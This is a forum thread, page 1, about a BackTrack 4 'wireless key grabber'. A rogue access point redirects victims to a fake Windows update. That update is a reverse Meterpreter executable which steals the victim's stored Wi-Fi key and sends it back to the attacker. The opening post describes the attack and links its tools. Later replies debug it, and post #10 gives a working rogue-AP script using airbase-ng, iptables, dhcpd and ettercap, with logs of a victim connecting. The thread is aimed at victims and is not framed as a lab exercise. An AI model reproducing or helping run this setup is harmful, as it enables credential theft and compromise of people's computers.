Page 1 of 5 123 ... LastLast
Results 1 to 10 of 44

Thread: Wireless key grabber - Backtrack 4

  1. #1
    Join Date
    Feb 2010


    I have simplified my previous tutorial on grabbing wireless keys

    specially setup for backtrack 4,

    here is the intro

    This is a simplified tutorial for grabbing wireless keys from our victim, regardless of their wireless security. The theory is we create a fake access point, our victim connects, tries to surf the internet but gets redirected to our fake update page. Victim then downloads our “windows update” which is a reverse meterpreter exe. Metasploit then runs it script, uploads wireless key viewer, executes on victims computer, creates a random titled text file containing the pc’s wireless key, and uploads back to backtrack.

    Crippled features :
    Reverse meterpreter port set to 5555, to be stealthy we should choose another port
    Windows update html (index.html), a very simplified page, to be stealthy you need to redesign
    rar file here

    readme at

    cr1spyj0nes --- is this what you needed?

    I'm sure we can automate the remainder,

    edit , lots of views but no comments? does it work?

  2. #2
    Junior Member
    Join Date
    Oct 2008


    I will try it out but before that I need also to get your Fake AP project running.

    Then I will understand this much more easier!

    By the way have a look in my thread I need some help over getting it to work.

    Do I have to disable the DHCP service on my router ? This might be one of the reasons why It didn't work.

    Check it and let me know beside !

    Thank you!

  3. #3
    Just burned his ISO
    Join Date
    Mar 2009

    Default Wireless key grabber - Backtrack 4

    Thanks a lot for all ur tutorials so far.

    I tried ur method in BT4 with partially success. The first issue i had was with the dhcp server. The client was connected but unable to obtain a valid IP. After some investigation it appeared to be an issue with the user groups of the dhcpd.

    When i issued this command: # dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0
    It returned an error: Cannot create an entry /var/run/ -- Permission denied.

    To mitigate this I followed:
    #vim /var/run/
    #chgrp dhcpd /var/run/
    #chown dhcpd /var/run/
    Then i restarted the dhcp server and connected clients were able to get valid IPs.

    The next issue I had was obtaining the key.
    Once i was connected to the fake IP, downloaded and installed the file, however i was not able to receive the txt file with the wpa key. On the metasploit terminal it stuck for ages on: Uploading key....(Or something like that)

    Any suggestions?



  4. #4
    Join Date
    Feb 2010


    are you sure you are using my wireless key grabber for backtrack 4 and not backtrack 3?

    i see u have issued

    dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0

    whereas u should have issued

    /etc/init.d/dhcp3-server restart

    if you are following the old tutorial then it may not work, follow this one and it should be fine

    can a mod merge with this thread please

  5. #5
    Just burned his ISO
    Join Date
    Mar 2009


    I definately used the correct grabber.

    As I explained i had an issue with the dhcp, not issuing IPs once connected. By trying to restart the dhcp server with this command "/etc/init.d/dhcp3-server restart" it was displaying a "fail" error message. Hence my workaround to bypass this issue, which worked a treat.

    However my issue was with the keygrabber not uploading back the key.
    From the connected client i telnet back to my BT4 on port 5555 to see if a connection is established. As soon as i connected to the port i could see all that the registry values been transfered, and on the metasploit terminal a message appeared as "upload success", however no txt file was present on the BT4.

    hmmm i m a bit puzzled....I ll give it another go with a different laptop.
    (Pls note that the laptop i tried it on was of limited priviledges so i dont know if this pose any limitations.....)

    I cannot post yet on the wireless section, thus my new thread in this section...

  6. #6
    Join Date
    Feb 2010


    ah i see, didn't realise that you couldn't post in the wireless section,

    looks like you almost got it to work, wkv uploaded and executed and victim's computer, just the key text file not downloaded,

    open up the harvester.rb file and look at the coding in there, maybe you just need to amend the destination of the text file,

    i can explain each line to you if you get stuck

  7. #7
    Junior Member
    Join Date
    Apr 2008


    hm2075 please can you upload rar file and readme file on somewhere else rather than megaupload

  8. #8
    Join Date
    Feb 2010


    any suggestions?

  9. #9
    Moderator theprez98's Avatar
    Join Date
    Jan 2010


    Threads merged

  10. #10
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Chico CA


    I'm trying to work through your tutorial. I'm running Backtrack 3, so I know some of the pre-requisites will install and behave differently. With that said, can you perhaps help me troubleshoot my configuration?
    Attack PC:
    RTL8187L USB adapter

    MS Vista
    Intel 4965AGN

    Things work up to the victim receiving an IP. What I can't seem to figure out is why traffic is not forwarding through the attacker eth0. Once that is addressed, I can move on to getting lighttpd working on BT3.

    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/`
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 netmask
    ifconfig at0 mtu 1400
    route add -net netmask gw
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j MASQUERADE
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j MASQUERADE
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    3:41:24  Got broadcast probe request from 00:18:DE:3C:FB:BF
    13:41:24  Got broadcast probe request from 00:1D:E0:4F:B0:07
    13:41:25  Got directed probe request from 00:1F:3B:00:F2:51 - "test1234"
    13:41:25  Got an auth request from 00:1F:3B:00:F2:51 (open system)
    13:41:25  Client 00:1F:3B:00:F2:51 associated (unencrypted) to ESSID: "test1234"
    13:41:25  Got broadcast probe request from 00:18:DE:69:47:CD
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    Listening on at0... (Ethernet)
       at0 ->       00:C0:CA:19:A0:8C
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    DHCP: [00:1F:3B:00:F2:51] DISCOVER
    DHCP: [00:1F:3B:00:F2:51] REQUEST
    DHCP: [] ACK : GW DNS

    Listening on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPDISCOVER from 00:1f:3b:00:f2:51 via at0
    DHCPOFFER on to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPREQUEST for ( from 00:1f:3b:00:f2:51 (victim) via at0
    DHCPACK on to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPINFORM from via at0

Page 1 of 5 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts